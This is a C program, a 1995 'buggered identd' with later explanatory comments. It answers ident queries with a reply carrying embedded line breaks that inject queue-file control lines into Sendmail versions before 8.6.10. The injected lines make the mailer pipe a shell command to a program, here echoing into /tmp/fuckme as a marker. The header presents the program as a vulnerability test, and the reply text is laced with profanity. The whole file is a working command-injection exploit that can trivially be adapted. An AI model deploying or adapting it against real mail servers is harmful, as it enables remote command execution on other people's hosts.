/* This is a "buggered identd" that tests the queue-file bug in Sendmails
   earlier than 8.6.10 and possibly some versions of 5.x.  It responds with
   embedded lines that, if the receiving Sendmail is buggy, get added to the
   queue file as control information or strange extra headers.

   This attempts to deliver mail to the file /tmp/fuckme, which will most
   likely be owned by bin or daemon or whatever UID your mailer runs as.
   If this file shows up, you have the bug.

   You should upgrade to sendmail 8.6.11, which is out now.

   This source is essentially unchanged from the original, and contains a
   fair amount of obscenity in the response, which you are free to remove.

   Avian Research, *Hobbit*, or any Internet provider bears NO responsibility
   for content or misuse of this program or any derivatives thereof.  This
   is designed solely as a testing service, not a cracking tool.

   Dedicated to:
	Mike Scheidell @ fdma.com
	Tom Jennings @ tlg.net

   _H*  950309 */

/* Derived from "generic responder" code. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <syslog.h>
#include <unistd.h>

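/*
 * Read one query line from stdin, echo it back on stdout inside an ident-style
 * reply, log the event via syslog, and exit.
 *
 * The reply is deliberately long and carries embedded "\r\n" sequences followed
 * by lines starting with C, R and H.  Per the file header, a receiver that
 * copies the ident reply into its queue file without rejecting embedded line
 * breaks treats those lines as control information or extra headers; the
 * marker file named in the reply appearing on the mail host is the positive
 * test result.  A receiver that truncates the reply at the first CR/LF is
 * unaffected.
 *
 * stdin/stdout are presumably the network connection (e.g. started from
 * inetd); nothing in this file opens a socket itself.
 *
 * Returns EXIT_SUCCESS after replying, EXIT_FAILURE if no query line could be
 * read.
 */
int main (void) {

  /* Original read limit, kept so the echoed query has the same maximum
     length as before (76 characters plus the terminator). */
  enum { QUERY_READ_MAX = 77 };
  char buf[80];
  size_t len;

  /* Without this check a closed connection left buf uninitialized and the
     strlen() below read indeterminate memory. */
  if (fgets (buf, QUERY_READ_MAX, stdin) == NULL)
    return EXIT_FAILURE;

  /* Strip the trailing line ending.  Working from a length rather than a
     pointer avoids stepping in front of buf when the line is empty or only
     one character long. */
  len = strlen (buf);
  while (len > 0 && (buf[len - 1] == '\r' || buf[len - 1] == '\n'))
    buf[--len] = '\0';

/* The reply is laid out with line continuations so ordinary text can be
   converted into a compatible form by appending "\r\n\" to each line.
   buf is only ever passed as a %s argument, never as the format string. */

  printf ("\
%s : USERID : UNIX : This_is_fucking_GOD,okay?...get_over_it.  Actually, \
this is a test of the emergency buffer bogosity system.  Does your mailer \
believe that the following...\
\r\nCroot\r\nR<\"|/bin/echo HAHA > /tmp/fuckme\">\r\nHReceived: are \
genuine headers?  Why didn't anyone think about these things TEN YEARS AGO?! \
If this were a real \
IDENTD, you would see a much shorter line pop out, and your daemon would \
stand a much better chance of NOT crashing.  Thank you so much for NOT \
bounds-checking your input, allowing dangerous user-settable options, doing \
sprintf()s to non-length-checked buffers with raw stuff you get from the net, \
indexing off signed integers ... you get the HINT YET??  Is this enough \
text for your poor little server to handle??!?  Are we \
up to at least 512 characters yet? ... Have a fucking LOVELY day, \
really.\r\n\
", buf);

  /* Leaves an audit trail of each query in the auth facility. */
  syslog (LOG_AUTH | LOG_INFO, "query!");
  fflush (stdout);
  sleep (1);		/* so the net finishes flushing */
  return EXIT_SUCCESS;
}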

